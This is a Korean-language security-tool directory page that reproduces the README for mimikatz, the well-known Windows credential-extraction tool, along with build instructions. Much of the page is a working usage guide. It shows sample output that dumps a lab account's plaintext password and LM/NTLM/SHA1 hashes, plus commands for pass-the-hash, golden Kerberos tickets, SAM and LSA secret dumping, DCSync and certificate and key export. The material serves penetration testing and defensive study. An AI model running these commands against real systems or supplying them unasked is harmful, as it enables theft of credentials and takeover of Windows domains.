Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
mimikatz — Windows 보안을 가지고 놀 수 있는 작은 도구 | Kitploit
도구/GitHubGitHub/gentilkiwi/mimikatz
Password CrackingPenetration Testing FrameworksExploit FrameworksPassword AttacksPersistence MechanismsExploitationHash AnalysisLateral MovementPost-ExploitationPenetration TestingAuthenticationRed Teaming
21.8k4.2k574개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Payload Development
Exploitation #12위
Exploit Frameworks #15위
Hash Analysis #20위
Lateral Movement #20위
Password Attacks #9위
Password Cracking #9위
Penetration Testing Frameworks #15위
Persistence Mechanisms #11위
Post-Exploitation #3위
Red Teaming #10위
GitHubgentilkiwi/mimikatz

mimikatz

Windows 보안을 가지고 놀 수 있는 작은 도구

저장소 보기웹사이트

mimikatz

**mimikatz**는 제가 C를 배우고 Windows 보안에 대한 몇 가지 실험을 하기 위해 만든 도구입니다.

현재는 메모리에서 평문 비밀번호, 해시, PIN 코드, Kerberos 티켓을 추출하는 것으로 잘 알려져 있습니다. **mimikatz**는 또한 pass-the-hash, pass-the-ticket 또는 _Golden 티켓_을 생성할 수 있습니다.

root@kitploit:~
  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr  6 2014 22:02:03)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   https://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                    with  13 modules * * */


mimikatz # privilege::debug
Privilege '20' OK
 
mimikatz # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
...

하지만 그게 전부가 아닙니다! Crypto, Terminal Server, Events, ... GitHub Wiki(https://github.com/gentilkiwi/mimikatz/wiki) 또는 https://blog.gentilkiwi.com(프랑스어, 네)에서 많은 정보를 확인할 수 있습니다.

직접 빌드하고 싶지 않다면, 바이너리는 https://github.com/gentilkiwi/mimikatz/releases 에서 사용할 수 있습니다.

빠른 사용법

root@kitploit:~
log
privilege::debug

sekurlsa

root@kitploit:~
sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

root@kitploit:~
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

root@kitploit:~
crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export

vault & lsadump

root@kitploit:~
vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local

빌드

mimikatz는 Visual Studio 솔루션과 WinDDK 드라이버(주요 작업에는 선택 사항) 형태로 제공되므로, 다음과 같은 사전 요구 사항이 필요합니다:

  • mimikatz 및 mimilib의 경우: Desktop용 Visual Studio 2010, 2012 또는 2013 (Desktop용 2013 Express는 무료이며 x86 및 x64를 지원합니다 - http://www.microsoft.com/download/details.aspx?id=44914)
  • mimikatz driver, mimilove (및 ddk2003 플랫폼)의 경우: Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800

mimikatz는 소스 제어를 위해 SVN을 사용했지만, 이제는 GIT도 사용할 수 있습니다! Visual Studio 2013에 내장된 GIT을 포함하여 원하는 도구를 사용하여 동기화할 수 있습니다 =)

동기화!

  • GIT URL: https://github.com/gentilkiwi/mimikatz.git
  • SVN URL: https://github.com/gentilkiwi/mimikatz/trunk
  • ZIP 파일: https://github.com/gentilkiwi/mimikatz/archive/master.zip

솔루션 빌드

  • 솔루션을 연 후, 빌드 / 솔루션 빌드를 선택합니다(아키텍처 변경 가능).
  • 이제 mimikatz가 빌드되어 사용할 준비가 되었습니다! (Win32 / x64, 운이 좋다면 ARM64도 가능)
    • _build_.cmd 및 mimidrv에 대한 MSB3073 오류가 발생할 수 있습니다. 이는 Windows Driver Kit 7.1 (WinDDK) 없이 드라이버를 빌드할 수 없기 때문이지만, mimikatz와 mimilib는 정상입니다.

ddk2003

이 선택적 MSBuild 플랫폼을 사용하면 WinDDK 빌드 도구와 기본 msvcrt 런타임(더 작은 바이너리, 종속성 없음)을 사용할 수 있습니다.

이 선택적 플랫폼의 경우, Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 및 Visual Studio 2010이 필수이며, 이후에 Visual Studio 2012 또는 2013을 사용할 계획이더라도 마찬가지입니다.

지침을 따르세요:

  • https://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
  • https://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader

지속적 통합

mimikatz 프로젝트는 AppVeyor에서 사용할 수 있습니다 - https://ci.appveyor.com/project/gentilkiwi/mimikatz

상태: AppVeyor CI status

라이선스

CC BY 4.0 라이선스 - https://creativecommons.org/licenses/by/4.0/

mimikatz는 개발에 커피가 필요합니다:

  • PayPal: https://www.paypal.me/delpy/

작성자

  • Benjamin DELPY gentilkiwi, Twitter( @gentilkiwi ) 또는 이메일( benjamin [at] gentilkiwi.com )로 연락할 수 있습니다.
  • lsadump 모듈의 DCSync 및 DCShadow 기능은 Vincent LE TOUX와 공동 작성했습니다. 이메일( vincent.letoux [at] gmail.com )로 연락하거나 웹사이트( http://www.mysmartlogon.com )를 방문할 수 있습니다.

이것은 개인적인 개발물입니다. 철학을 존중하고 나쁜 목적으로 사용하지 마세요!

도구 다운로드